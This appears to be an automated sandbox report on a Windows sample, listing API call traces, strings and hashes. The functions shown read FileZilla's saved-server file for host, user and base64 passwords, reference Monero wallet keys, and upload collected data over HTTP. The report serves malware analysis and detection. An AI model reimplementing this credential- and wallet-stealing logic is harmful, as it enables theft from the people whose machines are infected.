lstrcat.KERNEL32(?,005EF648), ref: 00AB7C7E

Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00AD17FC), ref: 00AB7606
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00000000), ref: 00AB7648
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020, : ), ref: 00AB765A
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00000000), ref: 00AB768F
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00AD1804), ref: 00AB76A0
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00000000), ref: 00AB76D3
Part of subcall function 00AB75D0: lstrcat.KERNEL32(35235020,00AD1808), ref: 00AB76ED
Part of subcall function 00AB75D0: task.LIBCPMTD ref: 00AB76FB

lstrcat.KERNEL32(?,005EFA80), ref: 00AB7E0B
lstrcat.KERNEL32(?,005EE348), ref: 00AB7E1E
lstrlen.KERNEL32(35235020), ref: 00AB7E2B
lstrlen.KERNEL32(35235020), ref: 00AB7E3B

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Strings

H^, xrefs: 00AB7E11

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: H^
API String ID: 928082926-856137936
Opcode ID: ae2b40b1fe57a6c040aead7b0560ab77ccc51f12b026d3d5c84e871a16ba7a9f
Instruction ID: 344a05bcc35490e9773db6d838685053ccfcb4ef47cfd85ccda881ab5fffc02a
Opcode Fuzzy Hash: ae2b40b1fe57a6c040aead7b0560ab77ccc51f12b026d3d5c84e871a16ba7a9f
Instruction Fuzzy Hash: 6632CEB6910318ABC715EBA0DC85FEEB37CBB44700F444699F21DA2091EA75E789CF52

Function 00AC0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
Part of subcall function 00AB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
Part of subcall function 00AB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
Part of subcall function 00AB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
Part of subcall function 00AB99C0: LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
Part of subcall function 00AB99C0: CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

Part of subcall function 00AC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AC8E52

GetProcessHeap.KERNEL32(00000000,000F423F,00AD0DBA,00AD0DB7,00AD0DB6,00AD0DB3), ref: 00AC0362
RtlAllocateHeap.NTDLL(00000000), ref: 00AC0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00AC0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 00AC03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00AC0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00AC0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00AC0562
lstrcat.KERNEL32(?,profile: null), ref: 00AC0571
lstrcat.KERNEL32(?,url: ), ref: 00AC0580
lstrcat.KERNEL32(?,00000000), ref: 00AC0593
lstrcat.KERNEL32(?,00AD1678), ref: 00AC05A2
lstrcat.KERNEL32(?,00000000), ref: 00AC05B5
lstrcat.KERNEL32(?,00AD167C), ref: 00AC05C4
lstrcat.KERNEL32(?,login: ), ref: 00AC05D3
lstrcat.KERNEL32(?,00000000), ref: 00AC05E6
lstrcat.KERNEL32(?,00AD1688), ref: 00AC05F5
lstrcat.KERNEL32(?,password: ), ref: 00AC0604
lstrcat.KERNEL32(?,00000000), ref: 00AC0617
lstrcat.KERNEL32(?,00AD1698), ref: 00AC0626
lstrcat.KERNEL32(?,00AD169C), ref: 00AC0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD0DB2), ref: 00AC068E

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00AC02A4
profile: null, xrefs: 00AC0568
browser: FileZilla, xrefs: 00AC0559
login: , xrefs: 00AC05CA
<Port>, xrefs: 00AC03C6
url: , xrefs: 00AC0577
<Pass encoding="base64">, xrefs: 00AC045A
<Host>, xrefs: 00AC037C
<User>, xrefs: 00AC0410
password: , xrefs: 00AC05FB

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: cf23698a472693dc3d288436345871c84a9f78ac9c64898c8092ba234ab28d29
Instruction ID: 01ca84355099d2a9d235b1fe8486ba27d138f466f4f98fd4f359d2ad8cdfda78
Opcode Fuzzy Hash: cf23698a472693dc3d288436345871c84a9f78ac9c64898c8092ba234ab28d29
Instruction Fuzzy Hash: 1CD11BB1900108ABDB04EBF4DE96FFEB378BF24344F55451DF106A6191EE74AA06CB62

Function 00AB5100 Relevance: 49.6, APIs: 19, Strings: 9, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
Part of subcall function 00AB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

lstrlen.KERNEL32(00000000), ref: 00AB5193

Part of subcall function 00AC8EA0: CryptBinaryToStringA.CRYPT32(00000000,00AB5184,40000001,00000000,00000000,?,00AB5184), ref: 00AC8EC0

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AB5207
StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB5340
HttpOpenRequestA.WININET(00000000,005EFB40,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB53A4

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,005EFA40,00000000,?,005EEB70,00000000,?,00AD19DC,00000000,?,00AC51CF), ref: 00AB5737
lstrlen.KERNEL32(00000000), ref: 00AB574B
GetProcessHeap.KERNEL32(00000000,?), ref: 00AB575C
RtlAllocateHeap.NTDLL(00000000), ref: 00AB5763
lstrlen.KERNEL32(00000000), ref: 00AB5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AB57A9
lstrlen.KERNEL32(00000000), ref: 00AB57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AB57E1
lstrlen.KERNEL32(00000000,?,?), ref: 00AB580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AB5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AB584D
InternetCloseHandle.WININET(00000000), ref: 00AB58B1
InternetCloseHandle.WININET(00000000), ref: 00AB58BE
InternetCloseHandle.WININET(00000000), ref: 00AB58C8

Strings

------, xrefs: 00AB5297
------, xrefs: 00AB53B7
", xrefs: 00AB5482
", xrefs: 00AB5706
p^, xrefs: 00AB542E, 00AB5570, 00AB56B2
------, xrefs: 00AB54F9
--, xrefs: 00AB5280
------, xrefs: 00AB563B
", xrefs: 00AB55C4

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$p^
API String ID: 1224485577-2810582295
Opcode ID: 49b96acb7dcd73efe30277d15e33f139ccdbd5ae5a0e50cbc0c2fd435ee42f2e
Instruction ID: 70952369d4783549eccd2cd965d53b33115a3b89cc55fc5d4496133d9d275c13
Opcode Fuzzy Hash: 49b96acb7dcd73efe30277d15e33f139ccdbd5ae5a0e50cbc0c2fd435ee42f2e
Instruction Fuzzy Hash: 0C321E7292011CABDB14EBA0DD96FFEB378BF64704F41459DB10A62092EF706A49CF52

Function 00AB5960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
Part of subcall function 00AB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AB59F8
StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,005EFAB0,00000000,?,005EEB70,00000000,?,00AD1A1C), ref: 00AB5E71
lstrlen.KERNEL32(00000000), ref: 00AB5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00AB5E93
RtlAllocateHeap.NTDLL(00000000), ref: 00AB5E9A
lstrlen.KERNEL32(00000000), ref: 00AB5EAF
lstrlen.KERNEL32(00000000), ref: 00AB5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AB5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00AB5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AB5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AB5F4C
InternetCloseHandle.WININET(00000000), ref: 00AB5FB0
InternetCloseHandle.WININET(00000000), ref: 00AB5FBD
HttpOpenRequestA.WININET(00000000,005EFB40,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB5BF8

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

InternetCloseHandle.WININET(00000000), ref: 00AB5FC7

Strings

------, xrefs: 00AB5C0B
------, xrefs: 00AB5D4C
", xrefs: 00AB5CD5
p^, xrefs: 00AB5C82, 00AB5DC3
", xrefs: 00AB5E16
------, xrefs: 00AB5A96

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$p^
API String ID: 874700897-3577613220
Opcode ID: e5419207b75c6468aa9ea3235c003c04c32802927541ec8ae80c159113531651
Instruction ID: 55a703fb9c94ac61c4d4f86391d97714cbd3b4a219a9f9647ffc0e4212e6efaa
Opcode Fuzzy Hash: e5419207b75c6468aa9ea3235c003c04c32802927541ec8ae80c159113531651
Instruction Fuzzy Hash: EA12FA7292011CABDB15EBA0DD96FFEB378BF24704F51419DB10A62091EF702A49CF66

Function 00ABA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACAA70: StrCmpCA.SHLWAPI(005E88E8,00ABA7A7,?,00ABA7A7,005E88E8), ref: 00ACAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ABAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 00ABAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 00ABABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ABA8B0

Part of subcall function 00ACA820: lstrlen.KERNEL32(00AB4F05,?,?,00AB4F05,00AD0DDE), ref: 00ACA82B
Part of subcall function 00ACA820: lstrcpy.KERNEL32(00AD0DDE,00000000), ref: 00ACA885

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

lstrcat.KERNEL32(?,00000000), ref: 00ABACEB
lstrcat.KERNEL32(?,00AD1320), ref: 00ABACFA
lstrcat.KERNEL32(?,00000000), ref: 00ABAD0D
lstrcat.KERNEL32(?,00AD1324), ref: 00ABAD1C
lstrcat.KERNEL32(?,00000000), ref: 00ABAD2F
lstrcat.KERNEL32(?,00AD1328), ref: 00ABAD3E
lstrcat.KERNEL32(?,00000000), ref: 00ABAD51
lstrcat.KERNEL32(?,00AD132C), ref: 00ABAD60
lstrcat.KERNEL32(?,00000000), ref: 00ABAD73
lstrcat.KERNEL32(?,00AD1330), ref: 00ABAD82
lstrcat.KERNEL32(?,00000000), ref: 00ABAD95
lstrcat.KERNEL32(?,00AD1334), ref: 00ABADA4
lstrcat.KERNEL32(?,00000000), ref: 00ABADB7
lstrlen.KERNEL32(?), ref: 00ABAE0D
lstrlen.KERNEL32(?), ref: 00ABAE1C

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

DeleteFileA.KERNEL32(00000000), ref: 00ABAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00ABABD4

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
